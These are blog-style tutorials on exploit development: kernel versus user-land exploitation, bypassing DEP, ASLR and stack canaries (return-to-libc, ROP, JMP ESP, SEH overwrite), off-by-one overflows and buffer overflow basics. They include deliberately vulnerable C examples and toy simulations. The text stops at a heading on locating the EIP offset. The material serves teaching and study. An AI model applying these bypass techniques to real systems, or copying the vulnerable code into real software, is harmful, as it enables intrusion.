Kernel exploitation vs. user-land exploitation

Kernel exploits are used for privilege escalation, whereas user-land exploits aim to gain access to a system and execute an arbitrary command. The privilege of the spawned shell or executed command depends entirely on the privilege of the vulnerable target application, and in a hardened environment that privilege is minimal. If an administrator does not do his homework and runs a vulnerable web server under the root account, then the root privilege gained by successfully exploiting the web server is a bonus! The sole goal of a kernel exploit, on the other hand, is privilege escalation. A kernel exploit is normally run after some sort of access to the system already exists; a remote kernel exploit is the exception. For example, an attacker may use a buffer overflow exploit against a vulnerable web server that runs under a limited user account and receive a shell with limited privileges. The attacker now wants to install a keylogger, and since a keylogger is basically a driver, the attacker needs root privileges or at least the privilege to load a driver. To obtain that privilege, he runs a kernel exploit that elevates the privilege of the spawned shell.

A kernel vulnerability is no different from a user-land vulnerability, but the way it is triggered is different. The kernel is composed of the scheduler, the memory manager, drivers and so on. A user-land application communicates with the operating system through system calls. A user-land program may also communicate with a driver using I/O calls. The kernel also communicates with the outside world through hardware, by way of drivers. For example, to connect to a web server, a client sends a packet to the network card of the server’s host. The packet arrives at the network card and is processed by the network driver, which is a kernel path. Apart from network drivers, most vulnerable kernel paths are only reachable through a system call made by a local program. Triggering an exploit from a local program gives you some degree of control. For example, bypassing ASLR and non-executable stacks is simple because you can place your shellcode in your own executable and read its address!

Exploiting the operating system kernel definitely introduces new challenges. Triggering a kernel vulnerability means tampering with the operating system itself, and that does not come without extra costs: you should always have a recovery phase in your kernel exploit to clean up your mess. Leveraging a kernel vulnerability also requires more knowledge, because many factors determine the state of the operating system. You cannot write a successful kernel exploit without knowing how other processes affect the kernel and how your exploit affects other processes. For example, as you will see in the privilege escalation shellcode tutorial, one method of transferring execution to your shellcode is to modify the system call table. Assume that your shellcode is placed at user-land virtual addresses as part of your program’s executable. To execute the shellcode, you update a system call entry so that it points to your shellcode. Now what happens if another process invokes that system call before your shellcode has had a chance to restore the system call table? The system probably crashes, because the other process does not see the virtual addresses of your process and a critical page fault is raised. To avoid this, you probably want to modify entries of the local descriptor table, which is different for each process, or choose an infrequently used system call instead of one in high demand.
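The recovery concern can be pictured with a user-space toy model. The sketch below is not kernel code: dispatch_table, original_handler, replacement_handler and call_with_temporary_hook are made-up names, and the table merely stands in for a system call table. It only shows the save, swap and restore pattern, and where the risky window lies.

```c
#include <assert.h>
#include <stddef.h>

/* Toy stand-in for a kernel dispatch table; NOT a real system call table. */
typedef long (*handler_fn)(long);

static long original_handler(long arg)    { return arg + 1; }
static long replacement_handler(long arg) { return arg * 100; }

#define TABLE_SIZE 4
static handler_fn dispatch_table[TABLE_SIZE] = {
    original_handler, original_handler, original_handler, original_handler
};

/* Every caller that dispatches through the table sees whatever is installed. */
long dispatch(size_t slot, long arg)
{
    assert(slot < TABLE_SIZE);
    return dispatch_table[slot](arg);
}

/*
 * Swap one entry, invoke it once, then restore the saved entry.
 * Between the swap and the restore, any concurrent caller of the same
 * slot would also reach the replacement handler.
 */
long call_with_temporary_hook(size_t slot, long arg)
{
    handler_fn saved;
    long result;

    assert(slot < TABLE_SIZE);
    saved = dispatch_table[slot];            /* remember the original entry */
    dispatch_table[slot] = replacement_handler;
    result = dispatch(slot, arg);
    dispatch_table[slot] = saved;            /* recovery phase */
    return result;
}
```

Calling dispatch(2, 5) before and after call_with_temporary_hook(2, 5) returns the same value, which is the property a recovery phase is meant to guarantee.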

It should come as no surprise that remote kernel exploits are even more challenging. Not only do you have the aforementioned challenges of local kernel exploits, you also face ASLR, non-executable stacks and stack canaries. Because of all these problems, most people believe that an arbitrary memory overwrite is the only exploitable vector for remote kernel exploits. It should also be mentioned that this type of vulnerability is very common in drivers. For example, UserSharedData on Windows and the Vsyscall page on Linux are perfect places to write the shellcode to. These places have fixed addresses and are mapped twice. The mapping seen from a kernel path is writable, so you can place the shellcode there without worrying about a non-executable stack.

In the kernel shellcode article you will see how a kernel exploit elevates the privilege of a process.

The reference for this article, as for the other kernel exploitation material on this website, is the book A Guide to Kernel Exploitation.

Published in Kernel Exploitation

Bypass DEP and NX bit | Bypass ASLR | Bypass Stack Canary and Cookie

Buffer overflows are no longer the most popular vulnerabilities. Vulnerability analysis tools help developers identify buffer overflows (at least the obvious ones) at development time, and this has significantly reduced their number. Moreover, protections such as non-executable stacks, Address Space Layout Randomization and stack canaries have made life miserable for buffer overflow exploit writers even when they do find a buffer overflow. Nonetheless, buffer overflows are still a threat; in some situations they are exploitable and can lead to old-school arbitrary code execution.

Learning the methods to bypass each of these security mechanisms gives you, as an exploit developer, the insight to leverage a buffer overflow when it is exploitable, and it also keeps you from wasting time hunting for buffer overflows when they are not. From a developer’s point of view, you also come to understand the importance of each security mechanism.

Non-Executable Stack (NX bit) | Data Execution Prevention (DEP)

If you haven’t yet read my introduction to buffer overflow exploit development, I strongly encourage you to do so before reading the rest of this article. In that article we placed our shellcode on the stack as part of the buffer. That was possible because we were working on an old operating system with an executable stack. An executable stack is a prerequisite, because with a non-executable stack the CPU refuses to execute instructions located in stack memory.

Non-executable stacks are made possible by the NX bit of the architecture. The NX bit has been available since the later x86-32 processors; when it is set for a memory page, such as a stack page, code on that page cannot be executed. It took some time before operating systems made use of this bit. For example, Microsoft introduced the Data Execution Prevention (DEP) feature in Windows XP Service Pack 2, which uses the NX bit to mark stack memory as non-executable. Since the arrival of x86-64 platforms, nearly all operating systems enable non-executable stacks by means of page table entries.

Address Space Layout Randomization (ASLR) 

Before ASLR, you could predict the address of your shellcode almost precisely. You saw how we did that with a debugger in my introduction to buffer overflow exploit development. To understand ASLR and the difference it made, you need to know how a process address space is managed. Nearly all operating systems support paging, and paging brings virtual address space isolation. This means every process sees the whole memory as its own (or at least all of it except the kernel part). No process can reference another process’s memory. This is possible because every process has its own page table, and when a process is scheduled for execution its page table is loaded into the MMU. Address space isolation made life very easy for compilers: they can pick a fixed starting virtual address and use addresses relative to it in the program’s executable. In our example we relied on this to predict the address of our shellcode. Operating-system-dependent factors still play a part in determining the program’s address space. For example, environment variables change the starting address of the program’s variables on the stack. However, a NOP sled easily neutralizes the effect of such OS factors.

With the advent of ASLR, a program’s virtual addresses were no longer fixed, and we could no longer hard-code the address of our shellcode into the exploit. If ASLR is active for a program, the addresses change on every run, and you do not know the address of your shellcode at the time you inject it into the buffer. ASLR is an operating system feature. Finding out whether your operating system of choice has ASLR is as easy as running a program several times and examining its addresses with a debugger. ASLR operates in two modes, and the mode a program runs in depends on how it was compiled. In the first mode, only the addresses of the stack and data segments are randomized, while the code (text) segment addresses are fixed. In the second mode, which is the default for network libraries and sensitive programs, the addresses of all segments are randomized. Knowing which mode your target program operates in is very important, as you will see in the section on bypassing ASLR.
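As an alternative to a debugger, a program can report its own addresses. The following is only a rough sketch under that assumption: struct layout, sample_layout and print_layout are names invented here, and converting a function address to an integer relies on behaviour that common compilers accept but the C standard leaves implementation-defined.

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* One sample address from each region of the process (names are illustrative). */
struct layout {
    uintptr_t code;   /* address of a function (text segment) */
    uintptr_t data;   /* address of a global (data segment)   */
    uintptr_t heap;   /* address returned by malloc           */
    uintptr_t stack;  /* address of a local variable          */
};

static int global_marker = 1;

struct layout sample_layout(void)
{
    struct layout l;
    int local_marker = 0;
    void *heap_block = malloc(16);

    assert(heap_block != NULL);
    l.code  = (uintptr_t)&sample_layout;
    l.data  = (uintptr_t)&global_marker;
    l.heap  = (uintptr_t)heap_block;
    l.stack = (uintptr_t)&local_marker;
    free(heap_block);
    return l;
}

/* Prints the sampled addresses; compare the output of several runs. */
void print_layout(void)
{
    struct layout l = sample_layout();

    printf("code  %#jx\n", (uintmax_t)l.code);
    printf("data  %#jx\n", (uintmax_t)l.data);
    printf("heap  %#jx\n", (uintmax_t)l.heap);
    printf("stack %#jx\n", (uintmax_t)l.stack);
}
```

Calling print_layout() from main and running the program several times shows which regions move: if only the stack and heap lines change, the text segment is not randomized for that build.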

Stack Canaries | Cookies

A stack canary is a compiler feature, not a feature of the operating system or the architecture. As you saw in my introduction to buffer overflow exploit development, our final goal in leveraging a buffer overflow was to overwrite the return address on the stack. The stack canary provides a way to detect an overwrite of the saved instruction pointer (IP) and stop execution. The logic is very simple: a 4-byte value known as the stack canary or stack cookie is placed just before the return address on the stack, and a check is performed before the function returns to see whether it has been overwritten. If it has, the return address has probably been overwritten too, and execution should be stopped before control flow reaches the shellcode.

Compilers place a piece of code, or a call to a function, at the beginning of each protected function that sets up the stack and places the canary on it. They also add a piece of code at the end of each function that checks the current canary value against the initial one and stops execution if an attack is detected. Of course this affects performance, so some compilers only activate the stack canary for sensitive functions (those that have at least one variable or one input). Below is an example of a function that is called at the beginning of a stack-canary-protected function (the code is taken from the book A Guide to Kernel Exploitation):

__SEH_prolog4_GS:
 push offset _except_handler4          ; handler for the new exception registration record
 push dword ptr fs:[0]                 ; link to the previous record
 mov eax,dword ptr [esp+10h]
 mov dword ptr [esp+10h],ebp
 lea ebp,[esp+10h]
 sub esp,eax
 push ebx
 push esi
 push edi
 mov eax,dword ptr [__security_cookie] ; load the global cookie
 xor dword ptr [ebp-4],eax
 xor eax,ebp                           ; mix the cookie with the frame pointer
 mov dword ptr [ebp-1Ch],eax           ; store the canary in the frame
 push eax
 mov dword ptr [ebp-18h],esp
 push dword ptr [ebp-8]
 mov eax,dword ptr [ebp-4]
 mov dword ptr [ebp-4],0FFFFFFFEh
 mov dword ptr [ebp-8],eax
 lea eax,[ebp-10h]
 mov dword ptr fs:[00000000h],eax      ; install the new record
 ret

This code also sets up the exception registration record on the stack on 32-bit Windows 2003.
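The place-then-check logic of a canary can be modelled without touching a real stack. The sketch below is a simplified simulation, not compiler output: the 16-byte frame layout, the offsets and the name copy_and_check are assumptions made for illustration, and the length assertion exists only to keep the toy itself memory-safe.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Simulated 32-bit frame, lowest address first: buffer, canary, return address. */
enum { BUF_SIZE = 8, CANARY_OFF = 8, RET_OFF = 12, FRAME_SIZE = 16 };

/*
 * Copies len bytes of input into the simulated frame starting at the buffer,
 * the way an unchecked copy would, then performs the epilogue check.
 * Returns 1 if the canary survived, 0 if the overwrite was detected.
 */
int copy_and_check(const unsigned char *input, size_t len, uint32_t canary)
{
    unsigned char frame[FRAME_SIZE] = {0};
    uint32_t stored;

    assert(input != NULL && len <= FRAME_SIZE);

    memcpy(frame + CANARY_OFF, &canary, sizeof canary);  /* prologue: place the canary  */
    memcpy(frame, input, len);                           /* the "vulnerable" copy       */
    memcpy(&stored, frame + CANARY_OFF, sizeof stored);  /* epilogue: reload and compare */
    return stored == canary;
}
```

An input of 8 bytes stays inside the buffer and the check passes; any longer input has to cross the canary on its way to the return address, so the check fails.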

Bypassing Anti-Exploitation protections

Now that you know what the buffer overflow protections are and where they come from, you are ready to learn how to bypass them. We first introduce the methods particular to each protection and then review how to circumvent them when they are in place together.

Bypass Non-Executable Stack protection | NX bit

Bypass Non-Executable Stack protection in local exploitation

In local kernel exploits you can easily bypass the NX bit protection. You store your shellcode as part of the executable that exploits the vulnerability, and you redirect execution to the address of the shellcode. The success of this method again depends on your architecture. On CISC architectures such as x86, the kernel address space sits above the user-land address space, so you can address user-land memory from the kernel. When you store your shellcode as part of the executable and trigger a kernel exploit, the shellcode is reachable from the vulnerable kernel path.

Bypass Non-Executable Stack protection in remote exploitation

As mentioned, non-executable stacks prevent you from running shellcode that you inject into the vulnerable stack buffer. One solution to this problem is the return-to-libc approach. Instead of running our own code to spawn a shell, we redirect execution to a shared library function that does the same. One of the traditional targets is the “system” function in the libc library. Of course the success of this solution depends on the architecture. On x86-32, parameters are passed on the stack, and since you control the stack you can place the parameters for system there and call the function by replacing the return address with its address. On x86-64, however, parameters are passed in registers, so this solution does not work as is. An enhanced version of the method, named code borrowing, can be used instead. In code borrowing you redirect execution to some pop instructions that load the parameters from the stack into the registers. Once your registers are ready, you redirect execution to the function. For the redirection to work, the last pop must be followed by a ret.

Shared library developers learned to remove functions like system, so you cannot always redirect execution to a critical libc function because it may not exist. Exploit writers, for their part, invented a successor to this method: Return Oriented Programming (ROP). In this approach, instead of redirecting the call just once, you craft the stack so that several redirections take place. Each redirection ends with a “ret” instruction, and each one executes part of the shellcode’s work. When execution reaches the “ret”, the next redirection address is popped from the stack, which is the place we control. The redirection addresses point into the text segment of the executable or of shared libraries. This method works on the x86-32 architecture. By combining it with code borrowing you can also exploit x86-64 architectures.
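The way a chain of “ret”-terminated pieces consumes a controlled stack can be illustrated with a small emulator. This is a conceptual toy only: the gadget identifiers, the two-register machine and run_chain are invented for this sketch and do not correspond to real addresses or instructions in any binary.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical gadget identifiers standing in for addresses in a text segment. */
enum gadget { G_POP_A = 1, G_POP_B = 2, G_ADD_A_B = 3, G_HALT = 4 };

struct machine {
    uint32_t a, b;           /* two toy registers                   */
    const uint32_t *stack;   /* words supplied by the chain author  */
    size_t sp, size;         /* next word index and total word count */
};

/* Takes the next word off the simulated stack. */
static uint32_t pop(struct machine *m)
{
    assert(m->sp < m->size);
    return m->stack[m->sp++];
}

/* Runs the chain: each gadget ends in an implicit "ret" that pops the next id. */
uint32_t run_chain(const uint32_t *stack, size_t size)
{
    struct machine m = { 0, 0, stack, 0, size };

    for (;;) {
        switch (pop(&m)) {                       /* "ret": fetch the next gadget */
        case G_POP_A:   m.a = pop(&m); break;    /* like "pop reg; ret"          */
        case G_POP_B:   m.b = pop(&m); break;
        case G_ADD_A_B: m.a += m.b;    break;
        case G_HALT:    return m.a;
        default:        assert(!"unknown gadget"); return 0;
        }
    }
}
```

The chain { G_POP_A, 40, G_POP_B, 2, G_ADD_A_B, G_HALT } interleaves gadget identifiers with the data words the pop gadgets consume, which mirrors how code borrowing loads registers from the stack before the final redirection.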

Bypassing Address Space Layout Randomization | ASLR

As mentioned in the Address Space Layout Randomization section, there are two modes of ASLR. In the position independent code mode, the code, data and stack segments are all randomized. In the other mode, only the stack and data segment addresses are randomized. Of course the latter is easier to bypass. All you need is to find a JMP ESP instruction in the code (.text) segment of the executable and redirect control flow there. It may sound odd for JMP ESP to exist in a normal executable, but no worries! The JMP ESP opcode is the byte pair FF E4, and since x86 does not require instructions to be aligned in memory, you can jump into the middle of another instruction that happens to contain this pattern. The .text segment addresses are not randomized, so the address you find is fixed. After the redirection, control goes back to the stack, and all you need is to place the shellcode after the return address on the stack. If the overflow is not big enough for that, you can place just a “short jump” instruction after the return address to redirect control to the addresses below the return address. Since a short jump takes a relative displacement, you only need to know the distance from the jump to the shellcode and encode that negative displacement as a two’s complement byte after the return address.
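Two pieces of arithmetic from this paragraph can be sketched in C: scanning a byte range for the FF E4 pair, and encoding a short jump displacement. The function names find_jmp_esp and encode_short_jmp are made up for this illustration; the only encoding facts assumed are that the short jump is EB followed by a signed 8-bit displacement measured from the end of the two-byte instruction.

```c
#include <assert.h>
#include <stddef.h>

/* Returns the offset of the first FF E4 byte pair in buf, or -1 if absent. */
long find_jmp_esp(const unsigned char *buf, size_t len)
{
    size_t i;

    assert(buf != NULL);
    for (i = 0; i + 1 < len; i++) {
        if (buf[i] == 0xFF && buf[i + 1] == 0xE4)
            return (long)i;
    }
    return -1;
}

/*
 * Encodes a two-byte short jump (EB rel8) located at jmp_off that lands on
 * target_off. rel8 is relative to the end of the jump instruction.
 * Returns 0 on success, -1 if the target is outside the -128..127 range.
 */
int encode_short_jmp(long jmp_off, long target_off, unsigned char out[2])
{
    long rel = target_off - (jmp_off + 2);

    assert(out != NULL);
    if (rel < -128 || rel > 127)
        return -1;
    out[0] = 0xEB;
    out[1] = (unsigned char)rel;   /* conversion wraps to the two's complement byte */
    return 0;
}
```

For instance, the bytes B8 FF E4 00 00 encode a mov of the constant 0x0000E4FF into eax, yet the scan finds FF E4 at offset 1 inside that instruction. A jump at offset 100 that must land 42 bytes before its own end, at offset 60, is encoded as EB D6.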

If the code is compiled with the position independent code option, you have to search the executable and shared libraries for fixed addresses. For example, the Vsyscall page on x86-64 Linux kernels before 3.1 provided fast system calls such as time(), gettimeofday() and getcpu() at static addresses. On Windows, the Process Environment Block (PEB) data structure also used to be at a fixed address. Using the ROP method discussed in the previous section for bypassing DEP, you can assemble a series of useful gadgets (a few instructions ending with a ret instruction) found at these fixed addresses and build your shellcode from them.

There may also be weaknesses in the ASLR implementation that allow you to brute-force the exploit. Brute forcing is possible when the randomization is somewhat predictable, i.e. when the range of randomized addresses is known. In those cases a single success is enough to compromise the system.

Bypassing Stack Canaries | Cookies

I open this discussion with the most obvious solution: reveal the stack canary and forge it in your exploit. In theory this solution seems simple, but there are considerations. First, the canary is neither predictable nor a fixed value. In some cases, however, it has proved to stay the same for a process throughout its lifetime. This means that if you already have some control over the running process, you may be able to reveal the canary value and forge it. This is very useful for a local exploit, and specifically for a local kernel exploit. For remote exploits it does not seem feasible unless you also have an arbitrary read vulnerability that lets you inspect the memory and use the leaked canary value in a subsequent stack buffer overflow exploit.

Stack canaries used to be easy to bypass, especially on Microsoft operating systems before the NT 6 kernel. For example, on Windows XP or 2003 (all service packs) you could bypass the stack canary check with the aid of the Structured Exception Handling (SEH) mechanism. SEH is an exception handling mechanism that Microsoft introduced in its version of C++. C++ applications compiled for Windows operating systems before NT 6 place exception registration records on the stack. When an exception is raised, the address of the first exception registration record is fetched and control is passed to its handler. If a buffer overflow is big enough, the attacker can overwrite an exception registration record on the stack and continue the overflow until an exception is raised (for example, when the overflow reaches addresses that are not mapped). The exception handling code takes the exception record (manipulated by the attacker) from the stack and control goes there. Because of the exception, the function never finishes, so the code that checks the canary is never called, and you have redirected execution to wherever you want using the manipulated exception registration record.

With the advent of NT version 6 kernels, the SEH overwrite no longer works, since the exception registration records are no longer placed on the stack. In those situations the simplest antidote to the stack canary is not to touch the canary or the return address at all. With this method you hunt for an important variable on the stack that sits before the canary. You may be able to execute an arbitrary command if there is a function pointer on the stack. If not, you must look for a sensitive variable on the stack whose manipulation gains you some benefit. Another solution is to turn the buffer overflow into an index-based overwrite and overwrite the return address without touching the canary. Of course this method does not always work, since not every overflow can be turned into an index-based overwrite.
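The difference between a linear overflow and an index-based overwrite can be shown on a simulated frame. The layout below (two buffer slots, then the canary, then the return address) and the names linear_write, indexed_write and canary_intact are assumptions made for this sketch; the bounds assertions only keep the simulation inside its own array.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Simulated frame as 32-bit slots: two buffer slots, canary, return address. */
enum { SLOT_CANARY = 2, SLOT_RET = 3, FRAME_SLOTS = 4 };

struct frame { uint32_t slot[FRAME_SLOTS]; };

/* A linear overflow passes through every slot between the buffer and its end. */
void linear_write(struct frame *f, size_t count, uint32_t value)
{
    size_t i;

    assert(f != NULL && count <= FRAME_SLOTS);
    for (i = 0; i < count; i++)
        f->slot[i] = value;
}

/* An index-based write touches only the slot the index selects. */
void indexed_write(struct frame *f, size_t index, uint32_t value)
{
    assert(f != NULL && index < FRAME_SLOTS);
    f->slot[index] = value;
}

/* The epilogue check: has the canary slot kept its original value? */
int canary_intact(const struct frame *f, uint32_t canary)
{
    assert(f != NULL);
    return f->slot[SLOT_CANARY] == canary;
}
```

Writing four slots linearly reaches the return address but destroys the canary on the way, whereas indexed_write(&f, SLOT_RET, value) changes the return address and leaves the canary check passing.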

I close the discussion of stack canaries with a word on symmetric multiprocessor (SMP) systems. As you may know, on these systems several processors execute instructions concurrently. This opens a new exploitation vector for us. Suppose your target is a process with multiple threads, each scheduled to run on one of the CPUs. If you manage to cause an overflow large enough to run past the current page and overwrite the next one, you may have a chance to execute an arbitrary command. The next page may contain data that is being used by another thread, so your shellcode may get executed before the first thread triggers the canary check failure!

Bypassing multi layered | defense in depth protections

In a defense-in-depth strategy, a combination of the aforementioned protections is in place. You normally see both ASLR and DEP (non-executable stack) in current Microsoft, Linux and Mac operating systems, although there are still programs that do not support these features. The latest approach to bypassing these protections is ROP. On x86-64 systems you may also need code borrowing, because function parameters are passed in registers on that architecture. If a program is compiled with the stack canary option, it really depends on your case. If the buffer overflow can be turned into an index-based overwrite, you have a chance to overwrite the return address without touching the stack cookie.

Conclusion

Stack overflows are not as common or as popular as they were several years ago. Prevention methods on one side and protection mechanisms on the other have made the exploitation of buffer overflows very hard. Now that you are familiar with the architecture, operating system and compiler barriers in the way of exploitation (and also their antidotes), you can secure your software products with open eyes. On the other hand, if you are a hacker or penetration tester, you should have learned that hacking is an art that requires creativity; there may be an easy solution around the corner waiting for you! That being said, buffer overflows are still a threat, but do not invest more time than necessary hunting for stack overflows where the bar is too high!

Published in Exploit development
Tuesday, 23 June 2015 00:00

Off-by-one buffer overflow

An off-by-one vulnerability is a type of buffer overflow that lets you modify only one byte. It results from a miscalculation of the buffer length. Below is an example of an off-by-one vulnerability in C:

int get_user(char *user)
{
    char buf[1024];

    /* off by one: a 1024-character string passes, but strcpy writes 1025 bytes */
    if(strlen(user) > sizeof(buf))
        die("error: user string too long\n");

    strcpy(buf, user);

    ...
}

The Art of Software Security Assessment, Listing 5-3

Here strlen returns the length of the string without counting the terminating null character. A user string of exactly 1024 characters therefore passes the check, and strcpy copies it into buf and writes the null byte into whatever is adjacent to the buffer. If the compiler does not use any padding, the adjacent value is the saved EBP.
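The miscalculation comes down to one comparison operator. The helpers below are a small sketch written for this explanation (strcpy_footprint, listing_check_accepts and corrected_check_accepts are not part of the quoted listing); they contrast the check from the listing with one that also leaves room for the terminating null byte.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Number of bytes strcpy writes for s: the characters plus the terminating NUL. */
size_t strcpy_footprint(const char *s)
{
    assert(s != NULL);
    return strlen(s) + 1;
}

/* The check from the listing: rejects only strings strictly longer than the buffer. */
int listing_check_accepts(const char *user, size_t bufsize)
{
    assert(user != NULL);
    return !(strlen(user) > bufsize);
}

/* A corrected check: the string and its NUL must both fit in the buffer. */
int corrected_check_accepts(const char *user, size_t bufsize)
{
    assert(user != NULL);
    return strlen(user) < bufsize;
}
```

For a 1024-character string and a 1024-byte buffer, the listing's check accepts the input although strcpy needs 1025 bytes, while the corrected check rejects it.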

Sometimes compiler padding and reordering of variables make an off-by-one vulnerability unexploitable. In certain situations, however, we can still execute arbitrary code, even though an off-by-one stack overflow gives us no direct control over ESP. Depending on how the compiler orders variables, you may also have the opportunity to overwrite a specific variable that is vital to the application.

Exploiting Off-by-one buffer overflow vulnerability

Exploiting an off-by-one vulnerability really depends on where the vulnerable buffer is located and on which other buffers the user controls. If the buffer is directly adjacent to the saved EBP (it is the first variable after EBP on the stack), the off-by-one lets us change the least significant byte of the saved EBP. This gives us the ability to manipulate the ESP of the calling function, because in some situations the function epilogue copies EBP back into ESP when that function returns. Being able to alter a function’s stack pointer in turn gives us the opportunity to manipulate the EIP. If we change the least significant byte of the saved EBP so that it points into a buffer we control, we can craft that buffer so that it contains a custom address that will be restored as the saved EIP. This custom address can point to another user-controllable buffer that contains the shellcode. Bam: when the second function returns, with its ESP derived from the altered EBP, our arbitrary code is executed.

[Figure: off-by-one stack buffer overflow exploit]
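The effect of the stray null byte on the saved EBP is plain arithmetic. The sketch below assumes a little-endian 32-bit frame pointer and uses hypothetical addresses; the function names are invented here, and return_slot reflects the usual "mov esp, ebp; pop ebp; ret" epilogue, in which the return address is read from the word just above the frame pointer.

```c
#include <assert.h>
#include <stdint.h>

/* The NUL byte lands on the lowest byte of a little-endian saved EBP. */
uint32_t ebp_after_off_by_one(uint32_t saved_ebp)
{
    return saved_ebp & 0xFFFFFF00u;
}

/* How far the frame pointer moves toward lower addresses (0 to 255 bytes). */
uint32_t ebp_shift(uint32_t saved_ebp)
{
    return saved_ebp - ebp_after_off_by_one(saved_ebp);
}

/* After "mov esp, ebp; pop ebp; ret" the return address is read from ebp + 4. */
uint32_t return_slot(uint32_t ebp)
{
    assert(ebp <= UINT32_MAX - 4u);
    return ebp + 4u;
}
```

With a hypothetical saved EBP of 0xBFFFF4A8, the altered value is 0xBFFFF400, which is 0xA8 bytes lower, and the caller would then fetch its return address from 0xBFFFF404. Whether that address falls inside a controllable buffer depends entirely on the actual stack layout.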

Published in Exploit development

Buffer overflow exploit development

Buffer overflow exploits leverage a particular type of software bug in which a buffer being read or written is not properly managed. Normally, input larger than the buffer leads to a fault or a crash. The art of exploit development, however, is to craft data that not only avoids crashing the program but also leads to arbitrary command execution. An experience such as the one in my Remote Hacking with Metasploit article proves how devastating a buffer overflow exploit can be, but you are not a real hacker until you are armed with the knowledge of exploit development.

What is a basic buffer overflow vulnerability?

There are tons of buffer overflow exploit tutorials, and even books, that teach the basic concepts of buffer overflow exploits. A good example is this presentation on the basic concepts of buffer overflows from syssec. I strongly recommend reading that PowerPoint presentation first and then continuing with the rest of this exploit development tutorial. From here on I assume that you have read it or that you have a basic understanding of what a buffer overflow is and why it can lead to arbitrary code execution.

Which programming languages should I know for exploit development?

Generally, to identify a large share of buffer overflow vulnerabilities through static code analysis you should be experienced in C and C++, and in particular comfortable with pointers. Besides C, a deep knowledge of assembly is required. Assembly is also needed for shellcode development (don’t worry, you will learn what shellcode is by the end of this article). Exploit writing itself does not require any particular programming language, although developing exploits with Metasploit is strongly recommended. Finally, a scripting language such as Python or Perl can save you a lot of time when fuzzing to detect a buffer overflow vulnerability and then when writing a snippet that runs the exploit automatically.

Buffer overflow example

In my Buffer overflow example article I introduced several buffer overflow examples in C, but here I give you a basic example of an unmanaged buffer that can lead to a buffer overflow exploit:

#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[]) {
    int value = 5;
    char buffer_one[8], buffer_two[8];

    strcpy(buffer_one, "one"); /* put "one" into buffer_one */
    strcpy(buffer_two, "two"); /* put "two" into buffer_two */

    printf("[BEFORE] buffer_two is at %p and contains \'%s\'\n", buffer_two, buffer_two);
    printf("[BEFORE] buffer_one is at %p and contains \'%s\'\n", buffer_one, buffer_one);
    printf("[BEFORE] value is at %p and is %d (0x%08x)\n", &value, value, value);

    printf("\n[STRCPY] copying %zu bytes into buffer_two\n\n", strlen(argv[1]));
    strcpy(buffer_two, argv[1]); /* copy first argument into buffer_two (no length check) */

    printf("[AFTER] buffer_two is at %p and contains \'%s\'\n", buffer_two, buffer_two);
    printf("[AFTER] buffer_one is at %p and contains \'%s\'\n", buffer_one, buffer_one);
    printf("[AFTER] value is at %p and is %d (0x%08x)\n", &value, value, value);
    return 0;
}

The Art of Exploitation - overflow_example.c

Here buffer_two is 8 bytes long, but no size check is performed before argv[1] is copied into it. This means you can pass 16 bytes or even more to cause a buffer overflow. If you compile and run this small program, you will see the effect of a buffer overflow: buffer_one is overwritten by the extra bytes. Surprised?! Don’t be. If you have read the basic concepts behind buffer overflows, you know that the stack grows down, which means that a variable declared later (here buffer_two) is placed at a lower address than the one declared before it (buffer_one), so writing past the end of buffer_two runs into buffer_one. If you pass a larger string, the program crashes, usually with a segmentation fault. The goal of exploit development (for buffer overflows specifically) is to leverage this bug and receive a shell or command prompt instead of a segmentation fault or program crash! How fun will that be, right? Be patient, we will get to that point. But first let’s review the requirements for exploit development.
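The overwrite of buffer_one can be reproduced safely by modelling the two buffers as one 16-byte region. This is a simulation under an assumed layout (buffer_two in bytes 0 to 7, buffer_one directly above it with no padding); simulate_copy is a name invented for this sketch, and real compilers are free to arrange the variables differently.

```c
#include <assert.h>
#include <string.h>

/* Simulated stack region: buffer_two occupies bytes 0..7, buffer_one bytes 8..15. */
enum { TWO_OFF = 0, ONE_OFF = 8, REGION = 16 };

/*
 * Copies input (with its NUL) into the region starting at buffer_two, as an
 * unchecked strcpy would, and reports what buffer_one holds afterwards.
 * one_out must have room for 8 bytes plus a NUL.
 */
void simulate_copy(const char *input, char one_out[9])
{
    char region[REGION] = {0};
    size_t n;

    assert(input != NULL && one_out != NULL);
    n = strlen(input) + 1;
    assert(n <= REGION);                    /* keep the simulation in bounds */

    memcpy(region + ONE_OFF, "one", 4);     /* strcpy(buffer_one, "one") */
    memcpy(region + TWO_OFF, "two", 4);     /* strcpy(buffer_two, "two") */
    memcpy(region + TWO_OFF, input, n);     /* the unchecked copy        */

    memcpy(one_out, region + ONE_OFF, 8);
    one_out[8] = '\0';
}
```

With the input "1234567890", the first eight characters fill buffer_two and the remaining "90" plus the null byte spill into buffer_one, so buffer_one no longer contains "one".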

Exploit experimentation operating system requirement

Ten years ago, exploit writing was much easier than it is now, because most of the current protections and security mechanisms against buffer overflows did not exist at that time. If you are eager to know how a simple piece of vulnerable code can be exploited on modern operating systems such as Windows 7 or Windows 8, you must be patient and read the articles in the Exploitation category, especially the Bypass ASLR, DEP and Stack Canary protections article. For now, to understand the concept, download an old OS such as Ubuntu 7.04 (Feisty Fawn) that has little to no protection. On such an operating system you can see that exploitation is feasible, learn the basic exploit development concepts, and then gradually build up your knowledge to hack on modern operating systems.

Why can buffer overflows lead to arbitrary code execution?

To answer this question we must know how a program is executed. A program is a collection of functions, and depending on the program’s algorithm, the main function calls other functions. The “main” function is the entry point of an application: when you launch an executable, the statements in main are executed one by one. A statement can be a call to a function, and the called function can in turn call another function. This nesting of calls can go arbitrarily deep, so how does the system keep track of which instruction to execute next?! I mean, once a function has finished executing, how does the system know which instruction follows the call? Well, a fast method is to keep the next instruction’s address exactly where the function’s variables and parameters are stored. That place is the stack, and to see its structure I again recommend reading this presentation. The “next instruction address” to execute after a function returns is stored above all of the function’s local variables. This means any buffer in a function that is vulnerable to overflow lies beneath the saved Extended Instruction Pointer (EIP). In other words, an overflow of any local variable in a function can potentially overwrite the next instruction address, the saved EIP, on the stack.

How can we successfully overwrite the EIP?

If you have played with the buffer overflow example, you have seen that lengthening the input eventually crashes the program. When the crash happens, you have overwritten the EIP. For successful exploitation, however, you need to know exactly how many bytes it takes to reach the EIP. I introduce two methods here: first using a debugger, and second by experimentation.

Finding the exact bytes to overwrite the EIP using a debugger

